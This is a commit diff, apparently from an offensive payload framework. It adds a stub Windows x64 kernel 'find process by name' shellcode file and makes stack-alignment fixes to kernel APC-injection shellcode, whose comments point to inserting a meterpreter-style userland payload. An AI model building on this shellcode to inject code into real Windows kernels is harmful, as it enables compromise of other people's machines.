small fixes

Author: zerosum0x0

payloads/x64/src/kernel/find_process_name.asm

@@ -0,0 +1,25 @@
+;
+; Windows x64 Kernel Find Process by Name Shellcode
+;
+; Author: Sean Dillon <[email protected]> (@zerosum0x0)
+; Copyright: (c) 2017 RiskSense, Inc.
+; License: Apache 2.0
+;
+; Arguments: r11d = process hash
+; Clobbers: RAX, RCX, RDX, R8, R9, R10, R11
+;
+
+[BITS 64]
+[ORG 0]
+
+find_process_name:
+  xor ecx, ecx
+
+_find_process_name_loop_pid:
+
+  add cx, 0x4
+  cmp cx, 0x1000
+  jb  _find_process_name_loop_pid
+
+  xor rax, rax
+  ret

payloads/x64/src/kernel/insert_queue_apc.asm

@@ -23,6 +23,8 @@ OBFDEREFERENCEOBJECT_HASH             equ      0x32c5ddf6   ; hash("ObfDereferen
 
   ; cld
 
+  push rsp
+  and sp, 0xFFF0                                    ; align stack
   push rsi                                          ; save clobbered registers
   push r14                                          ; r14 will store ntoskernl.exe
 
@@ -49,6 +51,7 @@ inject_end:
 
   pop r14
   pop rsi                                           ; restore clobbered registers and return
+  pop rsp
   ret
 
 userland_start:
@@ -59,4 +62,3 @@ userland_payload:
   ; insert user land payload here
   ; such as meterpreter
   ; or reflective dll with the metasploit MZ pre-stub
-